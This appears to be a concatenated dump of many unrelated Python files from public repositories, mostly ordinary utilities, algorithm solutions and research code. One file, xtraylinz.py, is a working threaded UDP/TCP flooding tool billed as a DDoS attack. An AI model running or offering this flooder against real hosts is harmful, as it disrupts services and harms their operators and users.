pass
| 179 |
vitrage-4.3.1/vitrage/evaluator/actions/__init__.py
|
scottwedge/OpenStack-Stein
| 89 |
2024430
|
# Copyright 2016 - Nokia
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
# Register options for the service
OPTS = [
cfg.StrOpt('evaluator_notification_topic_prefix',
default='vitrage_evaluator_notifications',
help='A prefix of the topic on which events will be sent from '
'the evaluator to the specific notifiers')
]
| 903 |
lightflow/models/utils.py
|
portrain/Lightflow
| 60 |
2024086
|
def find_indices(lst, element):
""" Returns the indices for all occurrences of 'element' in 'lst'.
Args:
lst (list): List to search.
element: Element to find.
Returns:
list: List of indices or values
"""
result = []
offset = -1
while True:
try:
offset = lst.index(element, offset+1)
except ValueError:
return result
result.append(offset)
| 442 |
xtraylinz.py
|
ExExExExA/xtr
| 3 |
2022874
|
#!/usr/bin/env python3
import random
import socket
import threading
print (" - - > DDOS ATTACK !! DDOS ATTACK !! < - - ")
print (" - - > DONT ABUSE THIS TOOLS !!!! < - - ")
print (" - - > MY DISCORD? XTraylinz#0965 <- - ")
print (" - - > JIKA BUTUH BANTUAN LEBIH LANJUT BISA PM DISCORD SAYA < - - ")
print (" - - > JOIN COMMUNITY LINK DIBAWAH < - - ")
print (" - - > https://discord.gg/nWDNdZRtBa < - - ")
print (" - - > BUAT YANG MAU BELAJAR LEBIH, JOIN SKUY < - - ")
ip = str(input(" Ip:"))
port = int(input(" Port:"))
choice = str(input(" (y/n):"))
times = int(input(" Paket :"))
threads = int(input(" Threads:"))
def run():
data = random._urandom(1000)
i = random.choice(("[+]","[-]"))
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
addr = (str(ip),int(port))
for x in range(times):
s.sendto(data,addr)
print(i +" XTRAYLINZ TEAM ATTACK ")
except:
print("[!] RUSAK")
def run2():
data = random._urandom(16)
i = random.choice(("[*]","[!]","[#]"))
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
s.send(data)
for x in range(times):
s.send(data)
print(i +" XTRAYLINZ TEAM ATTACK ")
except:
s.close()
print("[*] RUSAK")
for y in range(threads):
if choice == 'y':
th = threading.Thread(target = run)
th.start()
else:
th = threading.Thread(target = run2)
th.start()
| 1,494 |
code/778.swim-in-rising-water.py
|
ProHiryu/leetcode
| 3 |
2024318
|
#
# @lc app=leetcode id=778 lang=python3
#
# [778] Swim in Rising Water
#
# @lc code=start
class Solution:
'''
思路:
1. 记录所有到达过的节点
2. 使用heap保存接下来可以遍历的节点
3. 每次都先走time消耗最小的节点,使用heappop即可
'''
def swimInWater(self, grid: List[List[int]]) -> int:
if not grid or not grid[0]:
return False
i, j, N = 0, 0, len(grid)
hq = [(grid[0][0], (i, j))]
visited = set()
visited.add((i, j))
while True:
time, (i, j) = heapq.heappop(hq)
if i == N-1 and j == N-1:
return time
for x, y in [(i+1, j), (i-1, j), (i, j+1), (i, j-1)]:
if x >= 0 and x < N and y >= 0 and y < N:
if (x, y) in visited:
continue
visited.add((x, y))
heapq.heappush(hq, (max(time, grid[x][y]), (x, y)))
# @lc code=end
| 924 |
Time and Date/time_to_E3.py
|
Atropos148/PyQT5_tutorial
| 0 |
2024348
|
#!/usr/bin/python3
from PyQt5.QtCore import QDate
def ask_about_E3_date():
print("When is the next E3?")
E3_date_input = input('Put in date(numbers): year, month, day\n')
E3_date_fixed = E3_date_input.split(',')
for number in E3_date_fixed:
number.strip(' ')
return E3_date_fixed
now = QDate.currentDate()
print("Do you want E3 2018?")
answer = input('1. Yes\n2. No\n')
if int(answer) == 1:
next_E3 = QDate(2018, 6, 12)
else:
E3_date = ask_about_E3_date()
next_E3 = QDate(int(E3_date[0]), int(E3_date[1]), int(E3_date[2]))
print("Days until E3: {0}".format(now.daysTo(next_E3)))
| 627 |
jsonclasses/modifiers/div_modifier.py
|
Jesse-Yung/jsonclasses
| 50 |
2024278
|
"""module for div modifier."""
from __future__ import annotations
from typing import Any, Callable, Union, TYPE_CHECKING
from .modifier import Modifier
if TYPE_CHECKING:
from ..ctx import Ctx
from ..types import Types
class DivModifier(Modifier):
"""Div modifier divs number value."""
def __init__(self, by: int | float | Callable | Types):
self.by = by
def transform(self, ctx: Ctx) -> Any:
return ctx.val / self.resolve_param(self.by, ctx) if type(ctx.val) is int or type(ctx.val) is float else ctx.val
| 544 |
utils/webpage_designer.py
|
motelian/NutriSmart
| 0 |
2024306
|
import streamlit as st
def expander(food_dict, food_key, expander_handle):
''' This function creates an expandable bar in streamlit
and list all the food items user consumed for a specific
time in the day (e.g. Breakfast/Lunch/Dinner)'''
name = food_dict['food_name'].capitalize() + ' '+ '('+food_dict['serving_unit']+')'
qty = food_dict['serving_qty']
with expander_handle:
qty = st.text_input(name,value=str(qty),key=food_key)
return float(qty)
| 496 |
tests/pc/threading/script_2/main.py
|
RodrigoNazar/Evoluciones-Sensibles
| 0 |
2023061
|
import threading as th
import time
start = time.perf_counter()
def do_something(t=1):
print(f'\nSleeping {t} second...')
time.sleep(t)
print('Done Sleeping')
t1 = th.Thread(target=do_something)
t2 = th.Thread(target=do_something)
t1.start() # Empieza la ejecución del thread
t2.start()
t1.join() # Hay que esperar a que termine el thread para seguir
t2.join()
finish = time.perf_counter()
print(f'Finished in {round(finish - start, 2)} second(s)')
| 472 |
devops_function/functions/helloworldfn/func.py
|
jonschreiber/oci-devops-quickstart
| 6 |
2024351
|
#
# oci-load-file-into-adw-python version 1.0.
#
# Copyright (c) 2020 Oracle, Inc.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
#
import io
import json
import requests
from fdk import response
def handler(ctx, data: io.BytesIO=None):
return response.Response(
ctx,
response_data=json.dumps({"status": "Hello World! Version 0.0.1"}),
headers={"Content-Type": "application/json"}
)
| 478 |
setup.py
|
mushkevych/synergy_odm
| 0 |
2024125
|
from distutils.core import setup
setup(name='synergy_odm',
version='0.11',
description='Synergy Object-Document Mapper',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/mushkevych/synergy_odm',
packages=['odm'],
long_description='''Object Document Mapping for convenient python-to-json and json-to-python conversions''',
license='BSD 3-Clause License',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Software Development :: Libraries',
],
requires=[]
)
| 870 |
logout_test.py
|
uProxy/1-ufo-management-server
| 1 |
2024368
|
"""Test the logout module."""
from mock import patch
from config import PATHS
import unittest
import webtest
import logout
class LogoutTest(unittest.TestCase):
"""Test logout module functionality."""
def setUp(self):
"""Setup test app on which to call handlers."""
self.testapp = webtest.TestApp(logout.APP)
@patch('google.appengine.api.users.create_logout_url')
def testLogoutHandler(self, mock_create_url):
"""Test that logging out works without auth.
Also test that users can log back in without looping back through the
logout flow.
"""
fake_redirect_url = 'foo/bar'
mock_create_url.return_value = fake_redirect_url
response = self.testapp.get(PATHS['logout'])
mock_create_url.assert_called_once_with(PATHS['user_page_path'])
self.assertEqual(response.status_int, 302)
self.assertTrue(fake_redirect_url in response.location)
if __name__ == '__main__':
unittest.main()
| 941 |
apps/kg/utils.py
|
ketyi/dgl
| 9,516 |
2024509
|
# -*- coding: utf-8 -*-
#
# setup.py
#
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
def get_compatible_batch_size(batch_size, neg_sample_size):
if neg_sample_size < batch_size and batch_size % neg_sample_size != 0:
old_batch_size = batch_size
batch_size = int(math.ceil(batch_size / neg_sample_size) * neg_sample_size)
print('batch size ({}) is incompatible to the negative sample size ({}). Change the batch size to {}'.format(
old_batch_size, neg_sample_size, batch_size))
return batch_size
| 1,128 |
Practice-8100/cours1.py
|
BuiTTm/data-science-from-scratch
| 0 |
2023765
|
import numpy as np
from numpy.linalg import svd
X = np.matrix([1,1,1,0,2,5,2,5,-1]).reshape(3,3)
print(X)
X_T = np.matrix.transpose(X)
y = np.matrix([6, -4, 27]).reshape(3,1)
XT_X = np.matmul(X_T, X)
XT_y = np.matmul(X_T, y)
betas = np.matmul(np.linalg.inv(XT_X), XT_y)
print(f'betas={betas}')
#Section Vecteur et matrice propre
C = np.array([1,2,4,3]).reshape(2,2)
print(f'Vecteur prore et matrix propre={np.linalg.eig(C)}')
M = np.array([[4, 1, 5], [2, -3, 2], [1, 2, 3]])
U, Sigma, VT = svd(M)
print("Valeurs singulieres de gauche):")
print(U)
print("Valeurs singulieres:")
print(np.diag(Sigma))
print("valeurs singulieres de droite:")
print(VT)
| 656 |
5 kyu/Check that the situation is correct.py
|
mwk0408/codewars_solutions
| 6 |
2024064
|
def is_it_possible(field):
count_X=field.count("X")
count_0=field.count("0")
if abs(count_X-count_0)>=2 or count_0>count_X:
return False
if possible(field, "X") and possible(field, "0"):
return False
elif possible(field, "X") and count_X==count_0:
return False
elif possible(field, "0") and count_X!=count_0:
return False
return True
def possible(table, sign):
if table[0]==table[4]==table[8]==sign or table[2]==table[4]==table[6]==sign:
return True
elif any(table[i:i+3]==sign*3 for i in range(0, len(table), 3)) or any((table[i]+table[3+i]+table[6+i])==sign*3 for i in range(3)):
return True
return False
| 694 |
scripts/control/coach.py
|
Glaciohound/VCML
| 52 |
2024641
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File : coach.py
# Author : <NAME>, <NAME>
# Email : <EMAIL>, <EMAIL>
# Date : 17.07.2019
# Last Modified Date: 20.11.2019
# Last Modified By : Chi Han
#
# This file is part of the VCML codebase
# Distributed under MIT license
#
# for building training dataset and scheduling training
import os
import torch
from shutil import copyfile
from utility.common import make_dir, init_seed
class Coach:
def __init__(self,
args, index, schedule, question_parser, model,
tools, recordings, logger, local_dir,
message, control, device, plt, is_main):
self.args = args
self.index = index
self.schedule = schedule
self.question_parser = question_parser
self.model = model
self.tools = tools
self.logger = logger
self.local_dir = local_dir
self.message = message
self.control = control
self.device = device
self.plt = plt
self.is_main = is_main
self.__dict__.update(recordings)
model.set_coach(self)
self.init_value()
def init_value(self):
self.stage_ind = -1
self.epoch = -1
def add_ref_dataset(self, ref_dataset):
self.ref_dataset = ref_dataset
def step(self, i_epoch):
ind = 0
for i, item in enumerate(self.stages):
if item['start_time'] <= i_epoch:
ind = i
self.stage_ind = ind
self.setup_dataset(ind)
def schedule_dataset(self):
self.stages = []
offset = 0
for item in self.schedule:
new_dataset = {
'start_time': offset,
'end_time': offset + item['length'],
'question_splits': item['question_splits'],
'test_concepts': item['test_concepts'],
}
self.stages.append(new_dataset)
offset = new_dataset['end_time']
def setup_dataset(self, ind):
dataset_suite = self.stages[ind]['question_splits']
self.train = dataset_suite['train'].get_dataloader()
self.val = dataset_suite['val'].get_dataloader()
self.test = dataset_suite['test'].get_dataloader()
def torch_scheduler_step(self):
val_loss = self.val_recording.group['loss']
self.step(val_loss.value)
def state_dict(self):
stages_ckpt = [
{
'start_time': stage['start_time'],
'end_time': stage['end_time'],
'question_splits': {
split: dataset.state_dict()
for split, dataset
in stage['question_splits'].items()
},
'test_concepts': stage['test_concepts'],
} for stage in self.stages
]
ckpt = {
'model': self.model.state_dict(),
'tools': self.tools.state_dict(),
'optimizer': self.optimizer.state_dict(),
'scheduler': self.scheduler.state_dict(),
'logger': self.logger.state_dict(),
'train_recording': self.train_recording.state_dict(),
'val_recording': self.val_recording.state_dict(),
'test_recording': self.test_recording.state_dict(),
'stage_ind': self.stage_ind,
'stages': stages_ckpt,
'epoch': self.epoch,
}
if hasattr(self, 'ref_recording'):
ckpt['ref_recording'] = self.ref_recording.state_dict()
return ckpt
def partial_state_dict(self):
ckpt = {
'model': self.model.state_dict(),
'tools': self.tools.state_dict(),
}
return ckpt
def load_state_dict(self, ckpt):
self.model.load_state_dict(ckpt['model'])
self.tools.load_state_dict(ckpt['tools'])
self.optimizer.load_state_dict(ckpt['optimizer'])
self.scheduler.load_state_dict(ckpt['scheduler'])
self.logger.load_state_dict(ckpt['logger'])
self.train_recording.load_state_dict(ckpt['train_recording'])
self.val_recording.load_state_dict(ckpt['val_recording'])
self.test_recording.load_state_dict(ckpt['test_recording'])
if 'ref_recording' in ckpt and hasattr(self, 'ref_recording'):
ref_ckpt = ckpt['ref_recording']
if not isinstance(ref_ckpt, dict):
ref_ckpt = ref_ckpt.state_dict()
self.ref_recording.load_state_dict(ref_ckpt)
self.stage_ind = ckpt['stage_ind']
self.epoch = ckpt['epoch']
stages_ckpt = ckpt['stages']
for i, stage in enumerate(self.stages):
stage['start_time'] = stages_ckpt[i]['start_time']
stage['end_time'] = stages_ckpt[i]['end_time']
for split, dataset in stage['question_splits'].items():
dataset.load_state_dict(
stages_ckpt[i]['question_splits'][split])
stage['test_concepts'] = stages_ckpt[i]['test_concepts']
def load_partial(self, ckpt):
# load only what necessary for the pretrained model
self.model.load_state_dict(ckpt['model'], strict=False)
self.tools.load_state_dict(ckpt['tools'])
@property
def ckpt_dir(self):
ckpt_dir = os.path.join(self.args.local_log_dir, 'ckpt')
return ckpt_dir
def ckpt_filename(self, suffix, index):
filename = os.path.join(
self.ckpt_dir,
f'Coach{index}_{suffix}.pth'
)
return filename
def save(self, suffix, index=None):
if index is None:
index = self.index
ckpt = self.state_dict()
self.make_dir()
torch.save(ckpt, self.ckpt_filename(suffix, index))
def save_partial(self, suffix, index=None):
if index is None:
index = self.index
ckpt = self.partial_state_dict()
self.make_dir()
torch.save(ckpt, self.ckpt_filename(str(suffix) + '_partial', index))
def copy_ckpt(self, from_suffix, to_suffix, index=None):
if index is None:
index = self.index
from_name = self.ckpt_filename(from_suffix, index)
to_name = self.ckpt_filename(to_suffix, index)
copyfile(from_name, to_name)
def load(self, suffix, index=None):
if index is None:
index = self.index
ckpt = torch.load(
self.ckpt_filename(suffix, index),
map_location=self.device
)
self.load_state_dict(ckpt)
def make_dir(self):
make_dir(self.ckpt_dir)
def wait(self):
let_go = False
while not let_go:
command = self.get()
if command['type'] == 'let_go':
let_go = True
else:
self.process(command)
def ready(self):
self.send('ready')
def process(self, command):
if command['type'] == 'log':
self.logger(command['content'], pretty=True)
else:
raise Exception(f'unrecognized command: {command}')
def send(self, item):
self.message.put(item)
def get(self):
command = self.control.get()
return command
def training_init(self):
init_seed(self.args.random_seed)
self.model.to(self.device)
self.optimizer, self.scheduler = self.model.init()
def synchronize(self):
self.ready()
self.wait()
def set_index(self, index):
self.index = index
| 7,560 |
Exercicios/ex091 - Jogo de dados em python.py
|
anderdot/curso-em-video-python
| 0 |
2023717
|
# Desafio 091: Crie um programa onde 4 jogadores joguem um dado e tenham
# resultados aleatórios. Guarde esses resultados em um dicionário em Python.
# No final, coloque esse dicionário em ordem, sabendo que o vencedor tirou
# o maior número no dado.
from cores import cor
from random import randint
from operator import itemgetter
jogo = {
'Jogador 1': randint(1, 6),
'Jogador 2': randint(1, 6),
'Jogador 3': randint(1, 6),
'Jogador 4': randint(1, 6),
}
print(f'{" Valores Sorteados ":-^30}')
for k, v in jogo.items():
print(f'{cor.verde}{k}{cor.reset} tirou {cor.verde}{v}{cor.reset} no dado.')
print(f'{" Ranking ":-^30}')
jogo = sorted(jogo.items(), key=itemgetter(1), reverse=True)
for i, v in enumerate(jogo):
print(f"{'{1}{2}º{0} lugar: {1}{3}{0} com {1}{4}{0}.':^30}".format(
cor.reset,
cor.verde,
i + 1,
v[0],
v[1]
))
| 905 |
python/15.py
|
kylekanos/project-euler-1
| 0 |
2023724
|
#!/usr/bin/env python
# number of routes is c(40,20)
# (number of binary strings with
# 20 0's and 20 1's)
def fact(n):
return reduce(lambda x,y:x*y, xrange(2,n+1))
print fact(40)/(fact(20)*fact(20))
| 207 |
Assignments/2.4/Bonus17.py
|
cRohda/Comp-Sci
| 0 |
2024117
|
list1 = ['a', 2, 4, 2, 'a', 8, 4, 9, 2, 'b'] # Creates base list
list2 = [] # Creates empty final list
for i in list1: # Iterates through assigning i to each value in list1
if i in list2: # If the value of i can be found in list2:
pass # do nothing
else: # If the value of i cannot be found in list2 already
list2.append(i) # Add i to list2
print(list2) # Print the new value of list2
| 417 |
src/visualizations/make_pie_chart.py
|
nightingal3/metascience
| 2 |
2024277
|
import csv
import matplotlib.pyplot as plt
import pickle
import matplotlib.cm as cm
from collections import OrderedDict
from scipy.stats import pearsonr
from statsmodels.stats.multitest import multipletests
import pdb
import operator
order = OrderedDict({
"kNN": 0,
#"2NN": 1,
#"3NN": 2,
#"4NN": 3,
#"5NN": 4,
"exemplar": 5,
#"Exemplar (s=0.001)": 6,
#"Exemplar (s=0.1)": 7,
#"Exemplar (s=1)": 8,
#"Exemplar":9,
"progenitor": 10,
"prototype": 11,
#"Exemplar (s=1)": 8,
"local": 12,
"Null": 13
})
colours = dict(zip(order.keys(), plt.cm.Set3.colors[:len(order)]))
def get_winners(model_dict: dict, p_vals=True, len_included=False, include_null=False, dict_format=False) -> dict:
if "Exemplar (s=1)" in model_dict:
del model_dict["Exemplar (s=1)"] # no longer including base exemplar
if "Exemplar (s=0.1)" in model_dict:
del model_dict["Exemplar (s=0.1)"]
if "Exemplar (s=0.001)" in model_dict:
del model_dict["Exemplar (s=0.001)"]
if "2NN" in model_dict:
del model_dict["2NN"]
if "3NN" in model_dict:
del model_dict["3NN"]
if "4NN" in model_dict:
del model_dict["4NN"]
if "5NN" in model_dict:
del model_dict["5NN"]
if not include_null:
del model_dict["Null"]
scientists_to_models = {k: (-float("inf"), None) for k in model_dict[list(model_dict.keys())[0]]}
if len_included:
for model in model_dict:
for scientist in model_dict[model]:
if not dict_format:
if p_vals and model_dict[model][scientist][1] * len(scientists_to_models) > 0.05:
continue
if p_vals:
val = model_dict[model][scientist][0]
else:
if model == "Null":
continue
if model_dict[model][scientist][1] < 5:
if scientist in scientists_to_models:
del scientists_to_models[scientist]
continue
val = model_dict[model][scientist][0]
if val > scientists_to_models[scientist][0]:
scientists_to_models[scientist] = (val, [model])
elif val == scientists_to_models[scientist][0]:
scientists_to_models[scientist][1].append(model)
else:
if p_vals and model_dict[model][scientist]["p-val"] > 0.05:
continue
if model_dict[model][scientist]["num_papers"] < 5:
continue
win_ratio = model_dict[model][scientist]["win_ratio"]
if win_ratio > scientists_to_models[scientist][0]:
scientists_to_models[scientist] = (win_ratio, [model])
if win_ratio == scientists_to_models[scientist][0]:
scientists_to_models[scientist][1].append(model)
if include_null:
scientists_to_models = {k: v if v[0] > 0 else (0, ["Null"]) for k, v in scientists_to_models.items()}
else:
for model in model_dict:
for scientist in model_dict[model]:
val = model_dict[model][scientist]
if val > scientists_to_models[scientist][0]:
scientists_to_models[scientist] = (val, [model])
elif val == scientists_to_models[scientist][0]:
scientists_to_models[scientist][1].append(model)
if include_null:
scientists_to_models = {k: v if v[0] > 0 else (0, ["Null"]) for k, v in scientists_to_models.items()}
return scientists_to_models
def get_pairwise_differences(model_dict: dict, p_vals=True, include_null=True) -> dict:
if not include_null:
del model_dict["Null"]
scientists_to_models = {k: [] for k in model_dict['1NN']}
for model in model_dict:
for scientist in model_dict[model]:
scientists_to_models[scientist].append((model_dict[model][scientist], model))
gaps = []
all_1NN = []
all_progenitor = []
for scientist in scientists_to_models:
model_performance = sorted([i for i in scientists_to_models[scientist]], key=lambda x: x[0], reverse=True)
gaps.append((model_performance[0][0][0] - model_performance[1][0][0], model_performance[0][1], scientist))
#print(scientists_to_models[scientist])
all_1NN.append((scientists_to_models[scientist][0][0][0], scientists_to_models[scientist][0][0][1]))
all_progenitor.append((scientists_to_models[scientist][8][0][0], scientists_to_models[scientist][8][0][1]))
advantage_1NN = sorted([i for i in gaps if i[1] == "1NN"], key=lambda x:x[0], reverse=True)
advantage_progenitor = sorted([i for i in gaps if i[1] == "Prototype"], key=lambda x:x[0], reverse=True)
rank_1NN, scientists = zip(*(sorted(all_1NN, key=lambda x:x[0])))
print(advantage_1NN[:5])
print(advantage_progenitor[:5])
rank_1NN, num_papers = zip(*all_1NN)
print(rank_1NN)
print(num_papers)
rank_prog, num_papers_p = zip(*all_progenitor)
print(pearsonr(num_papers, rank_1NN))
print(pearsonr(num_papers_p, rank_prog))
plt.scatter(num_papers, rank_prog)
plt.savefig("num_papers_vs_prototype_dominance")
assert False
return advantage_1NN, advantage_progenitor
def make_pie_chart(scientists_to_models, include_null=True, len_included=False, filename="trial-pie") -> dict:
percentages = {}
plt.gcf().clear()
for scientist in scientists_to_models:
if scientists_to_models[scientist][1] is None:
continue
if not include_null and scientists_to_models[scientist][1][0] == "Null":
continue
if len(scientists_to_models[scientist][1]) == 1:
if scientists_to_models[scientist][1][0] not in percentages:
percentages[scientists_to_models[scientist][1][0]] = 1
else:
percentages[scientists_to_models[scientist][1][0]] += 1
else:
for mod in scientists_to_models[scientist][1]:
if mod not in percentages:
percentages[mod] = 1/len(scientists_to_models[scientist][1])
else:
percentages[mod] += 1/len(scientists_to_models[scientist][1])
num_not_null = len(scientists_to_models)
print(num_not_null)
if not include_null:
num_not_null = len([v for k, v in scientists_to_models.items() if v[1] is not None and v[1][0] != "Null"])
percentages = {k: v / num_not_null for k, v in percentages.items()}
#if "Exemplar" in percentages:
#percentages["Exemplar (s=0.01)"] = percentages["Exemplar"]
#del percentages["Exemplar"]
print(sorted(list(percentages.items()), key=operator.itemgetter(1), reverse=True))
percent_sorted = sorted(list(percentages.items()), key=lambda x: order[x[0]])
plt.pie([i[1] for i in percent_sorted], labels=[i[0] for i in percent_sorted], autopct='%1.1f%%', colors=[colours[key[0]] for key in percent_sorted], pctdistance=0.7, textprops={'fontsize': 10})
#plt.legend(patches, , loc="best")
plt.tight_layout()
if filename is not None:
plt.savefig(filename + ".png")
plt.savefig(filename + ".eps")
return percentages
if __name__ == "__main__":
models = pickle.load(open("results/summary/full/medicine-crp.p", "rb"))
# models_2 = pickle.load(open("results/full-2/medicine.p", "rb"))
# models_3 = pickle.load(open("results/full-2/economics.p", "rb"))
# models_4 = pickle.load(open("results/full-2/chemistry.p", "rb"))
# models_5 = pickle.load(open("results/full-2/cs.p", "rb"))
# for key in models:
# models[key].update(models_2[key])
# models[key].update(models_3[key])
# models[key].update(models_4[key])
# models[key].update(models_5[key])
# set len_included=False for authorship analysis
percent = make_pie_chart(get_winners(models, p_vals=False, include_null=True, len_included=True, dict_format=False), include_null=True, filename="cs-random")
assert False
get_pairwise_differences(models, include_null=False)
#make_pie_chart(models)
| 8,565 |
azazel/api/models/__init__.py
|
agata-project/azazel
| 4 |
2022993
|
from .course import Course
from .event import Event
from .user import User
from .talk import Talk, Workshop, Keynote
from .user_talk import UserTalk
| 149 |
VERSION_3/CREAR_TXT_BACKUP.py
|
san99tiago/AUTOMATIZACION-PROYECTOS-EMPRESA-ARQUITECTURA
| 0 |
2023337
|
# -*- coding: utf-8 -*-
##La linea superior se encarga de poder hacer encoding con reconocimiento de tildes y enne
#CODIGO PARA CREAR ARCHIVO TXT COMO BACKUP DE LOS REGISTROS EN LA CARPETA DONDE SE GUARDAN EXCELS
#Libreria para manejar la lectura correcta de los archivos TXT
import glob
import INFO_DIR_ACTUAL
class CREAR_TXT_BACKUP:
def __init__(self):
#Obtenemos el nombre del archivo de los registros
self.archivo = glob.glob("REGISTROS.txt")[0]
self.nuevo_txt()
def nuevo_txt(self):
#NUEVO_TXT permite escribir los registros nuevos, con el cambio de nombre de dicho proyecto
NUEVO_TXT = ""
#Se abre archivo TXT en modo lectura, que contiene info de los proyectos y todos los registros
txt = open( self.archivo, "r")
#Se lee el txt segun cada linea (para filtrar info mejor)
info_lineas = txt.readlines()
#Se lee cada linea por separado y se analiza para hacer el cambio de nombre
for line in info_lineas:
#Try except (para evitar problemas si queda una linea con "enter", y trate de buscar vector en posicion que NO existe)
try:
NUEVO_TXT = NUEVO_TXT + line
#Se evitan problemas de lectura y decodificacion, al emplear Try Except (ej: evitar problemas de lineas vacias)
except:
pass
txt.close()
#---------AHORA SE ESCRIBE NUEVO TXT CON INFO ACTUALIZADA DE NOMBRE DE PROYECTOS---------------
CARPETA_GUARDAR = INFO_DIR_ACTUAL.CREACION_CARPETA()
path_guardar = CARPETA_GUARDAR.devolver_ruta_guardado() + "\\REGISTROS_BACKUP.txt"
#Se abre archivo TXT con direccion de carpeta respectiva en modo write, que contiene info de los proyectos y todos los registros
txt = open( path_guardar, "w")
txt.write(NUEVO_TXT)
txt.close()
#-----------------------------------------------------------------------------------------------------------------------------------
#PRUEBA DE ESCRITORIO
# TEST1 = CREAR_TXT_BACKUP()
| 2,144 |
ui/curses/versionchooser.py
|
adpoliak/NSAptr
| 0 |
2023604
|
"""
Copyright 2016 adpoliak
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from distutils.version import LooseVersion
from sortedcontainers.sortedset import SortedSet
# import curses
# import os
# import sys
import typing
class VersionItem(object):
def __init__(self, name: str):
self._name = name
@property
def name(self):
return self._name
class VersionChoiceDialog(object):
@property
def chosen_version(self):
return self._chosen_version
@property
def do_not_ask_again(self):
return self._do_not_ask_again
@do_not_ask_again.setter
def do_not_ask_again(self, value: bool):
self._do_not_ask_again = value
@property
def keep_while_available(self):
return self._keep_while_available
@keep_while_available.setter
def keep_while_available(self, value: bool):
self._keep_while_available = value
@property
def persist(self):
return self._persist
@persist.setter
def persist(self, value: bool):
self._persist = value
@property
def return_code(self):
return self._return_code
@return_code.setter
def return_code(self, value: str):
self._return_code = value
def persist_action(self):
if self.persist is not None:
self.persist ^= True
if self.persist:
self.keep_while_available = False
self.do_not_ask_again = False
else:
self.keep_while_available = None
self.do_not_ask_again = None
def update_persist_state(self):
if self.keep_while_available or self.do_not_ask_again:
self.persist = None
else:
self.persist = False
def keep_action(self):
if self.keep_while_available is not None:
self.keep_while_available ^= True
self.update_persist_state()
def noprompt_action(self):
if self.do_not_ask_again is not None:
self.do_not_ask_again ^= True
def select_action(self):
self._chosen_version = list(self._child_names)[self._index]
if self.chosen_version.endswith(':KEEP'):
self._can_continue = False
self.persist = None
self.keep_while_available = None
self.do_not_ask_again = None
else:
self._can_continue = True
self.persist = False
self.persist = False
self.do_not_ask_again = False
def cancel_action(self):
self.return_code = 'cancel'
def accept_action(self):
if self._can_continue:
self.return_code = 'accept'
def __init__(self, master: typing.Optional[object], versions: SortedSet,
persist: typing.Optional[bool] = False, keep: typing.Optional[bool] = False,
last_used: typing.Optional[str] = None, *args, **kwargs):
# assign tkinter-compatible interface items to placeholder to placate PyCharm
_ = master
_ = args
_ = kwargs
self._can_continue = None
self._child_names = SortedSet(versions)
self._child_objects = None
self._chosen_version = None
self._do_not_ask_again = False
self._keep_while_available = keep
self._last_used = last_used
self._return_code = None
self._persist = persist
self._index = 0
if persist:
self.persist_action()
if keep:
self.keep_action()
if last_used is not None:
last_used_version_object = LooseVersion(last_used)
self._index = self._child_names.index(last_used_version_object) \
if last_used_version_object in self._child_names else 0
self.select_action()
| 4,308 |
12. Iteration and generators/Generators.py
|
riyabhatia26/Python-Programming
| 3 |
2022762
|
from builtins import set
def take(count,iterable):
counter =0
for item in iterable:
if counter == count:
return
counter += 1
yield item
def distinct(iterable):
seen = set()
for item in iterable:
if item in seen:
continue
yield item
seen.add(item)
def run_pipeline():
items = [3,6,2,1,1]
for item in take (3,list(distinct(items))) :
print(item)
run_pipeline()
# Graphical debugger
# Control flow is easier to see in graphical debugger
| 549 |
gencolors/genetics.py
|
ExcaliburZero/genetic-colors
| 0 |
2023801
|
from random import gauss, randint
import numpy as np
GOAL = (52, 152, 219)
MUTATION_CHANCE = 20
MUTATION_DEVIATION = 5
REPLACE_RATE = 1.1
def score_chromosome(self):
r_err = abs(self[0] - GOAL[0])
g_err = abs(self[1] - GOAL[1])
b_err = abs(self[2] - GOAL[2])
return r_err + g_err + b_err
def mate_chromosome(self, other):
c_red = self[0]
c_green = other[1]
c_blue = self[2]
child = np.array([c_red, c_green, c_blue])
if randint(0, MUTATION_CHANCE) == 0:
changes = [0, 0, 0]
color_to_change = randint(0, 2)
change = random_change()
changes[color_to_change] = change
mutate_chromosome(child, changes)
return child
def random_change():
change = gauss(0, MUTATION_DEVIATION)
return change
def bound(value, lower_lim, upper_lim):
if value > upper_lim:
return upper_lim
elif value < lower_lim:
return lower_lim
else:
return value
def mutate_chromosome(self, changes):
self[0] = bound(self[0] + changes[0], 0, 255)
self[1] = bound(self[1] + changes[1], 0, 255)
self[2] = bound(self[2] + changes[2], 0, 255)
def create_population(num):
return np.array([create_individual() for x in range(num)])
def create_individual():
red = randint(0, 255)
green = randint(0, 255)
blue = randint(0, 255)
return np.array([red, green, blue])
def next_generation(population):
scores = np.array([score_chromosome(c) for c in population])
positions = np.argsort(scores)
sorted_population = population[positions]
midpoint = int(sorted_population.shape[0] / REPLACE_RATE)
